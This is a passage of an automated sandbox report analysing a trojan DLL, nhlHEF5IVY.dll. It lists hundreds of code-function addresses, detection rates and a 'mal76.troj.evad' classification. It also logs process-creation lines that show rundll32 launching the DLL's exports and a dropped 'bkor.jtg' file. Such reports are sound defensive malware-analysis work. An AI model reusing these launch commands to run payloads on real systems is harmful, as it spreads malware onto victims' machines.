                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031BE10A4_2_031BE10A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031B590E4_2_031B590E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031B3D0C4_2_031B3D0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031BBF0C4_2_031BBF0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031AF73B4_2_031AF73B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031BCD354_2_031BCD35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031AA92F4_2_031AA92F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031B91244_2_031B9124
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031B65404_2_031B6540
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031C03704_2_031C0370
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031ACF6E4_2_031ACF6E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031ABD614_2_031ABD61
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031B15914_2_031B1591
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031AB1914_2_031AB191
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031A77954_2_031A7795
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031A358B4_2_031A358B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031B37824_2_031B3782
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031A8D804_2_031A8D80
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031A4B814_2_031A4B81
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031BDB874_2_031BDB87
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031B85B84_2_031B85B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031A43BE4_2_031A43BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031A59BF4_2_031A59BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031BD7BE4_2_031BD7BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031BE3B54_2_031BE3B5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031B89A24_2_031B89A2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031BE5A74_2_031BE5A7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031BDDA54_2_031BDDA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031B0BA44_2_031B0BA4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031A75D24_2_031A75D2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031A19C04_2_031A19C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031BEDED4_2_031BEDED
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031A51EC4_2_031A51EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031AA3E74_2_031AA3E7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031C261E4_2_031C261E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031A800A4_2_031A800A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031BC2054_2_031BC205
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031A243F4_2_031A243F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031A34324_2_031A3432
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031A32284_2_031A3228
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031B282D4_2_031B282D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031A98244_2_031A9824
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031ACE5A4_2_031ACE5A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031A64534_2_031A6453
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031AAA4E4_2_031AAA4E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031A544C4_2_031A544C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031B30434_2_031B3043
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031AAE434_2_031AAE43
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031B74454_2_031B7445
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031AFA784_2_031AFA78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031A387F4_2_031A387F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031BB6774_2_031BB677
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031A68694_2_031A6869
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031A3A6C4_2_031A3A6C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031AEE604_2_031AEE60
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031AB4644_2_031AB464
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031BA29B4_2_031BA29B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031B009A4_2_031B009A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031BE8994_2_031BE899
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031AFE9D4_2_031AFE9D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031B0A934_2_031B0A93
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031BCE904_2_031BCE90
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031B0E974_2_031B0E97
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031AF48A4_2_031AF48A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031AA0834_2_031AA083
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031C1CDB4_2_031C1CDB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031B52D14_2_031B52D1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031A90D44_2_031A90D4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031B28D54_2_031B28D5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031C20CE4_2_031C20CE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031B10CD4_2_031B10CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031A2CC24_2_031A2CC2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031A92C14_2_031A92C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031A46FA4_2_031A46FA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031A1EFB4_2_031A1EFB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031B40FE4_2_031B40FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031A84F04_2_031A84F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031B62F54_2_031B62F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031B4CF54_2_031B4CF5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031AC0EA4_2_031AC0EA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031B56E94_2_031B56E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0341EA556_2_0341EA55
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_034212916_2_03421291
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_034165406_2_03416540
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0340BD616_2_0340BD61
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0340CF6E6_2_0340CF6E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_034203706_2_03420370
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0341970A6_2_0341970A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0341E10A6_2_0341E10A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03413D0C6_2_03413D0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0341BF0C6_2_0341BF0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0341590E6_2_0341590E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0340CB136_2_0340CB13
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03404D1E6_2_03404D1E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_034191246_2_03419124
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0340A92F6_2_0340A92F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0341CD356_2_0341CD35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0340F73B6_2_0340F73B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_034019C06_2_034019C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_034075D26_2_034075D2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0340A3E76_2_0340A3E7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0341EDED6_2_0341EDED
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_034051EC6_2_034051EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03408D806_2_03408D80
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03404B816_2_03404B81
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_034137826_2_03413782
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0341DB876_2_0341DB87
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0340358B6_2_0340358B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_034115916_2_03411591
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0340B1916_2_0340B191
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_034077956_2_03407795
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_034189A26_2_034189A2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0341DDA56_2_0341DDA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03410BA46_2_03410BA4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0341E5A76_2_0341E5A7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0341E3B56_2_0341E3B5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_034185B86_2_034185B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_034043BE6_2_034043BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_034059BF6_2_034059BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0341D7BE6_2_0341D7BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_034130436_2_03413043
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0340AE436_2_0340AE43
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_034174456_2_03417445
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0340544C6_2_0340544C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0340AA4E6_2_0340AA4E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_034064536_2_03406453
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0340CE5A6_2_0340CE5A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0340EE606_2_0340EE60
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0340B4646_2_0340B464
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_034068696_2_03406869
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03403A6C6_2_03403A6C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0341B6776_2_0341B677
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0340FA786_2_0340FA78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0340387F6_2_0340387F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0341C2056_2_0341C205
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0340800A6_2_0340800A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0342261E6_2_0342261E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_034098246_2_03409824
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_034032286_2_03403228
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0341282D6_2_0341282D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_034034326_2_03403432
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0340243F6_2_0340243F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_034092C16_2_034092C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03402CC26_2_03402CC2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_034220CE6_2_034220CE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_034110CD6_2_034110CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_034152D16_2_034152D1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_034090D46_2_034090D4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_034128D56_2_034128D5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03421CDB6_2_03421CDB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_034156E96_2_034156E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0340C0EA6_2_0340C0EA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_034084F06_2_034084F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_034162F56_2_034162F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03414CF56_2_03414CF5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_034046FA6_2_034046FA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03401EFB6_2_03401EFB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_034140FE6_2_034140FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0340A0836_2_0340A083
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0340F48A6_2_0340F48A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0341CE906_2_0341CE90
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03410A936_2_03410A93
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03410E976_2_03410E97
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0341E8996_2_0341E899
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0341A29B6_2_0341A29B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0341009A6_2_0341009A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0340FE9D6_2_0340FE9D
                      Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6E4BAC90 appears 33 times
                      Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6E4A1DE0 appears 97 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6E4BAC90 appears 33 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6E4A1DE0 appears 97 times
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess Stats: CPU usage > 98%
                      Source: nhlHEF5IVY.dllVirustotal: Detection: 21%
                      Source: nhlHEF5IVY.dllReversingLabs: Detection: 18%
                      Source: nhlHEF5IVY.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\nhlHEF5IVY.dll,Control_RunDLL
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll"
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\nhlHEF5IVY.dll,Control_RunDLL
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\nhlHEF5IVY.dll,ajkaibu
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\nhlHEF5IVY.dll,akyncbgollmj
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Rxalrmpxe\bkor.jtg",APfz
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",Control_RunDLL
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4612 -ip 4612
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 304
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4612 -ip 4612
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 336
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Rxalrmpxe\bkor.jtg",Control_RunDLL
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",#1Jump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\nhlHEF5IVY.dll,Control_RunDLLJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\nhlHEF5IVY.dll,ajkaibuJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\nhlHEF5IVY.dll,akyncbgollmjJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Rxalrmpxe\bkor.jtg",APfzJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",Control_RunDLLJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",Control_RunDLLJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",Control_RunDLLJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Rxalrmpxe\bkor.jtg",Control_RunDLLJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4612 -ip 4612Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 304Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4612 -ip 4612Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 336Jump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:1664:64:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:5916:64:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4612
                      Source: C:\Windows\System32\svchost.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER9086.tmpJump to behavior
                      Source: classification engineClassification label: mal76.troj.evad.winDLL@32/14@0/0
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: nhlHEF5IVY.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: nhlHEF5IVY.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000C.00000003.955080145.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.978011043.0000000004CF1000.00000004.00000001.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000C.00000003.955080145.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.978011043.0000000004CF1000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000C.00000003.955080145.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.952942912.0000000000BA2000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.952718698.00000000010F7000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.953141393.0000000000BA2000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.978011043.0000000004CF1000.00000004.00000001.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000C.00000003.955080145.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.978011043.0000000004CF1000.00000004.00000001.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000C.00000003.952949030.0000000000BA8000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.955080145.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.953289647.0000000000BA8000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.953145712.0000000000BA8000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.978011043.0000000004CF1000.00000004.00000001.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000C.00000003.955080145.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.978011043.0000000004CF1000.00000004.00000001.sdmp
                      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000000C.00000003.952949030.0000000000BA8000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.953289647.0000000000BA8000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.953145712.0000000000BA8000.00000004.00000001.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000C.00000003.955080145.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.978011043.0000000004CF1000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000C.00000003.955080145.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.953383298.0000000000B9C000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.952935685.0000000000B9C000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.978011043.0000000004CF1000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 0000000C.00000003.952942912.0000000000BA2000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.953141393.0000000000BA2000.00000004.00000001.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000C.00000003.955080145.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.978011043.0000000004CF1000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000C.00000003.955080145.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.978011043.0000000004CF1000.00000004.00000001.sdmp
                      Source: Binary string: a[ojr^oCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 0000000C.00000002.961082404.00000000004D2000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdbk source: WerFault.exe, 0000000C.00000003.955080145.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.978011043.0000000004CF1000.00000004.00000001.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000C.00000003.955080145.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.978011043.0000000004CF1000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000000C.00000003.953383298.0000000000B9C000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.952935685.0000000000B9C000.00000004.00000001.sdmp
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001C13E7 push esi; retf 0_2_001C13F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4C6A93 push ecx; ret 0_2_6E4C6AA6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E4C6A93 push ecx; ret 2_2_6E4C6AA6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031A13E7 push esi; retf 4_2_031A13F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_034013E7 push esi; retf 6_2_034013F0
